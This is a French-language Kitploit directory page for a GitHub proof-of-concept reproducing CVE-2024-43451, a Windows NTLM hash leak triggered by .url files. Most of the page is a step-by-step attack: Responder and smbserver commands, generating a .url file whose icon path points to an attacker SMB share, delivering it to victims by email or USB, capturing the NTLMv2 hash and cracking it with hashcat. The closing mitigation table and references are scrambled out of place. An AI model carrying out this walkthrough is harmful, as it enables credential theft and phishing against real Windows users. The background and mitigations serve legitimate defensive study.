Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2024-43451-ntlm_hash_disclosure_reproduction — Reproduction de CVE : cve-2024-43451-ntlm_hash_disclosure_reproduction | Kitploit
Outils/GitHubGitHub/razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction
Cassage de Mots de PasseOutils de PhishingReconnaissanceAnalyse des VulnérabilitésExploitationCollecte d'InformationsApprentissage et ÉducationLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction

cve-2024-43451-ntlm_hash_disclosure_reproduction

Reproduction de CVE : cve-2024-43451-ntlm_hash_disclosure_reproduction

Voir le dépôt
6il y a 1 moisPas encore vérifié

CVE-2024-43451 — Vulnérabilité de divulgation de hachage NTLM par usurpation dans Windows

Présentation

CVE-2024-43451 est une vulnérabilité de divulgation de hachage NTLMv2 par usurpation dans Windows. Elle permet à un attaquant distant non authentifié de divulgâcher le hachage NTLM d'une victime en l'incitant à interagir avec un fichier .url malveillant. La vulnérabilité est déclenchée avec une interaction minimale de l'utilisateur — un simple clic droit, une suppression ou un déplacement du fichier suffit pour divulguer le hachage. Elle porte un score CVSS de 6,5 (Moyen) et a été activement exploitée dans la nature. CISA l'a ajoutée à son catalogue des vulnérabilités connues exploitées (KEV).

Détails techniques

Authentification NTLM

NTLM (NT LAN Manager) est un protocole d'authentification par défi-réponse utilisé par Windows. Lorsqu'un client tente d'accéder à une ressource via SMB, le client et le serveur effectuent une négociation :

  1. Le client envoie un NEGOTIATE_MESSAGE contenant les capacités prises en charge.
  2. Le serveur répond par un CHALLENGE_MESSAGE contenant un nonce de 8 octets (défi du serveur).
  3. Le client répond par un AUTHENTICATE_MESSAGE contenant le hachage NTLMv2 — un HMAC-MD5 du défi combiné avec le hachage du mot de passe de l'utilisateur, son nom d'utilisateur et son domaine.

Si un attaquant peut observer ou déclencher une tentative d'authentification NTLM vers une machine qu'il contrôle, le AUTHENTICATE_MESSAGE capturé peut être cassé hors ligne pour récupérer le mot de passe en clair.

Format du fichier .url

Un fichier .url est un fichier de raccourci utilisé par Internet Explorer et l'Explorateur Windows pour stocker des liens. C'est un fichier au format INI avec une section [InternetShortcut]. Les champs critiques pour l'exploitation sont :

  • URL= — l'URL cible que Windows ouvrira.
  • IconFile= — un chemin UNC optionnel vers une ressource d'icône. Lorsque l'Explorateur Windows affiche le fichier, il tente automatiquement de récupérer l'icône depuis le partage distant, déclenchant une tentative d'authentification NTLM vers le serveur de l'attaquant.

Vecteur d'attaque

L'attaquant crée un fichier .url avec un paramètre IconFile pointant vers \\ip-attaquant\partage\icon.ico. Lorsque la victime :

  • Fait un clic droit sur le fichier (l'Explorateur Windows récupère l'icône pour le menu contextuel),
  • Déplace ou copie le fichier (l'icône est re-lue), ou
  • Supprime le fichier (l'icône est récupérée pour la boîte de dialogue de la corbeille),

l'Explorateur Windows tente de charger l'icône depuis le chemin UNC, envoyant le hachage NTLMv2 de la victime au récepteur SMB de l'attaquant (par exemple, Responder).

Versions affectées

Toutes les versions prises en charge de Windows antérieures à la mise à jour du Patch Tuesday de novembre 2024 :

  • Windows 10 (toutes les versions)
  • Windows 11
  • Windows Server 2016 / 2019 / 2022 / 2025
  • Windows Server 2008 / 2012 R2
  • Les versions plus anciennes non prises en charge sont également probablement vulnérables mais ne recevront pas de correctifs.

Configuration de l'exploitation

Prérequis

  • Machine attaquante : Linux ou Windows avec un outil de capture SMB (par exemple, Responder, smbserver d'Impacket, ou Inveigh).
  • Machine victime : Tout système Windows non corrigé.
  • Accès réseau : La victime doit pouvoir atteindre l'IP de l'attaquant sur le port 445 (SMB).

Outils

OutilDescription
ResponderEmpoisonneur LLMNR/NBT-NS/mDNS avec serveur SMB intégré pour la capture de hachages
Impacket

Étapes de reproduction

1. Démarrer le récepteur SMB (machine attaquante)

Avec Responder :

root@kitploit:~
sudo responder -I eth0 -v

Ou avec Impacket :

root@kitploit:~
sudo impacket-smbserver share . -smb2support

2. Générer le fichier .url malveillant

root@kitploit:~
python exploit.py --ip 192.168.1.100 --output malicious.url

3. Distribuer le fichier à la victime

  • Pièce jointe d'email, clé USB, partage de fichiers ou téléchargement web.

4. Interaction de la victime

Toute action suivante déclenche la fuite du hachage :

  • Clic droit → l'icône est récupérée pour le menu contextuel → échange NTLM envoyé à l'attaquant
  • Suppression → l'icône est récupérée pour la boîte de dialogue de confirmation
  • Déplacement/Copie → l'icône est re-lue depuis le chemin UNC
  • Simple affichage du dossier en vue Détails ou Icônes (chargement des icônes)

5. Capturer le hachage

Le récepteur SMB de l'attaquant reçoit un hachage NTLMv2 :

root@kitploit:~
[SMB] NTLMv2-SSP Hash     : victim::DOMAIN:1122334455667788:0123456789abcdef0123456789abcdef:010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

6. Casser le hachage (hors ligne)

root@kitploit:~
hashcat -m 5600 captured.txt /usr/share/wordlists/rockyou.txt

Preuve de concept

root@kitploit:~
# Voir exploit.py dans ce dépôt pour une implémentation complète du PoC.
# Le script génère un fichier .url avec IconFile défini sur :
#   \\192.168.1.100\share\icon.ico
# et éventuellement une icône d'affichage personnalisée via IconIndex.

Atténuation

Références

  • Microsoft Security Response Center — CVE-2024-43451
  • Catalogue des vulnérabilités connues exploitées de CISA
  • NVD — CVE-2024-43451
  • Responder — GitHub
  • Impacket — GitHub
  • The Hacker News — Attaques ciblées ukrainiennes
  • Analyse de la campagne UAC-0194 / SparkRAT
Télécharger l’outil
smbserver.py peut être utilisé pour héberger un simple partage SMB
InveighOutil de capture NTLM basé sur PowerShell pour Windows
AtténuationDescription
Appliquer le correctif de novembre 2024Installer la mise à jour de sécurité de Microsoft à partir de KB5044285
Bloquer le SMB sortant (port 445)Empêcher les hachages NTLM de quitter le périmètre réseau
Désactiver NTLM si possibleUtiliser l'authentification uniquement Kerberos
Activer la signature SMBEmpêche les attaques de relais même si les hachages sont capturés
Formation à la sensibilisation des utilisateursEduquer les utilisateurs à ne pas interagir avec des fichiers .url inattendus
Restreindre la gestion des fichiers .urlUtiliser la stratégie de groupe pour bloquer l'exécution ou la distribution de fichiers .url par email